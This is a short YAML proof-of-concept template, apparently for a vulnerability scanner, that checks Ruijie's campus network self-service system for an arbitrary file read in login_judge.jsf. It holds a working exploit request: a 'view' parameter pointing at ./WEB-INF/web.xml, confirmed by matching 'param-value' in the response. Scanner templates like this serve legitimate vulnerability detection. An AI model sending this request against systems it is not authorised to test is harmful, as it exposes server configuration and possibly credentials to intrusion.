name: poc-yaml-ruijie-selfservice-login_judge-fileread
rules:
  - method: GET
    path: "/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate, br
      Accept-Language: zh-CN,zh;q=0.9
    expression: |
      response.status == 200 && response.body.bcontains(bytes("param-value"))
detail:
  author: yishuizhe
  name: 锐捷校园网自助服务系统login_judge任意文件读取